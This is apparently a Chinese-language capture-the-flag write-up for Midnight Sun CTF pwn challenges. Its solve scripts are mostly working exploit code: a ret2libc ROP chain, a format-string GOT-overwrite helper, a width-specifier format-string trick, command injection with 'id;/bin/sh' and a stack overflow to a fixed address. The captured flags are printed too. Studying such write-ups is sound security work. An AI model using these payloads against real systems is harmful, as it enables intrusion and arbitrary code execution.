只会做简单的，re没去做，做pwn去了。

pwn1

offset = 0x48
pop_rdi = 0x0000000000400783 # pop rdi ; ret
pop_rsi = 0x0000000000400781 # pop rsi ; pop r15 ; ret
main = 0x0000000000400698
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
puts_offset = libc.symbols["puts"]
system_offset = libc.symbols["system"]
str_bin_sh_offset = libc.search("/bin/sh").next()

p.recvuntil("buffer: ")

payload = "A" * offset
payload += flat([pop_rdi, puts_got, puts_plt, main])
p.sendline(payload)

libc_puts = u64(p.recv(6).ljust(8, "\x00"))
libc_base = libc_puts - puts_offset
libc_system = libc_base + system_offset
str_bin_sh = libc_base + str_bin_sh_offset

payload = "A" * offset
payload += flat([pop_rsi, 0, 0, pop_rdi, str_bin_sh, libc_system])
p.sendline(payload)

success("libc_base: " + hex(libc_base))
success("libc_system: " + hex(libc_system))
success("str_bin_sh: " + hex(str_bin_sh))

p.interactive()

midnight{the_pwnshank_redemption_d2b4205bea4b8eeb}

pwn2

def format_str(offset, addr_value_pairs, size, info=""):
    payload = ""
    length = 0

    for item in addr_value_pairs:
        for i in range(size):
            payload += p32(item[0] + i)
    
    length = len(payload)
    
    for item in addr_value_pairs:
        temp = item[1]
        for i in range(size):
            value = ((temp & 0xFF) + 0x100 - length) & 0xFF
            if value == 0:
                value = 0x100
            payload += "%" + str(value) + "c%" + str(offset) + "$hhn"
            length = temp & 0xFF
            temp >>= 8
            offset += 1

    payload += info

    return payload

context.log_level = "debug"

offset = 7
_exit = elf.got["exit"]
target_addr = 0x08048672
printf_got = elf.got["printf"]
main = 0x080485EB
__libc_start_main_ret_offset = libc.symbols["__libc_start_main"] + 241
system_offset = libc.symbols["system"]
str_bin_sh_offset = libc.search("/bin/sh").next()

payload = format_str(offset, [[_exit, main]], 2, "addr:%27$p")
p.sendlineafter("input: ", payload)

p.recvuntil("addr:0x")
__libc_start_main_ret = int(p.recv(8), 16)
libc_base = __libc_start_main_ret - __libc_start_main_ret_offset
libc_system = libc_base + system_offset

payload = format_str(offset, [[printf_got, libc_system]], 4)
p.sendline(payload)

payload = "/bin/sh\x00"
p.sendlineafter("input: ", payload)

success("libc_base: " + hex(libc_base))
success("libc_system: " + hex(libc_system))

p.interactive()

midnight{the_pwnfather_0ff771d2eccc36b8}

pwn4

没做出来，知识盲区：

printf("%2$*25$d%16$n");

输出第25个参数，并根据第2个参数宽度对齐。

没尝试打远程了，输出太长了，反正比赛结束了，直接打本地了。

from pwn import *

# context.log_level = "debug"

p = process("./pwn4")
gdb.attach(p, "b fprintf")

payload = "%2$*25$d%16$n"
p.sendline(payload)
p.sendline("5536")

p.interactive()

admpanel

def auth(name, passwd):
    p.sendlineafter(" > ", "1")
    p.sendafter("  Input username: ", name)
    p.sendafter("  Input password: ", passwd)

def execute(comm):
    p.sendlineafter(" > ", "2")
    p.sendafter("  Command to execute: ", comm)

auth("admin\n", "password\n")
execute("id;/bin/sh\x00\n")

p.interactive()

midnight{n3v3r_4sk_b0bb_to_d0_S0m3TH4Ng}

admpanel2

context.log_level = 'debug'

def auth(name, passwd):
    p.sendlineafter(" > ", "1")
    p.sendafter("  Input username: ", name)
    p.sendafter("  Input password: ", passwd)

def execute(comm):
    p.sendlineafter(" > ", "2")
    p.sendafter("  Command to execute: ", comm)

target_addr = 0x0000000000401598

name = "admin;/bin/sh;".ljust(0x3FE, "A") + '\n'
auth(name, "password\n")

comm = "B" * 0x10c + p64(target_addr) + "\n"
execute(comm)

p.interactive()

#flag: midnight{n3ver_4sk_hsp3_t0_do_s0m3th1ng}

midnight{n3ver_4sk_hsp3_t0_do_s0m3th1ng}

参考

1. http://blog.redrocket.club/2018/06/21/midnightsunctf-finals-2018-glitch/?tdsourcetag=s_pctim_aiomsg